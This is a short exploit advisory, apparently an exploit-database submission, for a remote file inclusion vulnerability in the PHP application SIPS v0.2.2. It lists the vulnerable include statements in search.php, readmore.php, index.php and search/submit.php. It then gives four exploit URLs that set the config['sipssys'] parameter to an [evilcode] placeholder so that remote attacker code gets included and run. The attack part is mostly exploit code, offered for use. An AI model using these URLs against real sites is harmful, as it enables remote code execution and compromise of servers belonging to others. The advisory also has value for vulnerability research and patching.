Hi Dear, Please publish this bug. Thank you
/===============================================================================================================================================\
|
|
| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability
|
|
|
| Software : SIPS v0.2.2
|
| Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
|
| Author : Cru3l.b0y
|
|
| Home : WwW.DeltaHacking.Net
|===============================================================================================================================================|
|
|
| [o] Vulnerable file
|
|
|
| search.php
|
|
|
| include $config["sipssys"] ."/code/news.inc.php";
|
|
|
| readmore.php
|
|
|
| include $config["sipssys"] ."/code/news.inc.php";
|
|
|
| index.php
|
|
|
| include $config["sipssys"] ."/code/news.inc.php";
|
| include $config["sipssys"] ."/code/box.inc.php";
|
|
|
| search/submit.php
|
|
|
| include $config["sipssys"] ."/code/search.inc.php";
|
|
|
|
|
|
|
| [o] Exploit
|
|
|
| http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
|
| http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]
|
| http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
|
|
http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]
|
|
|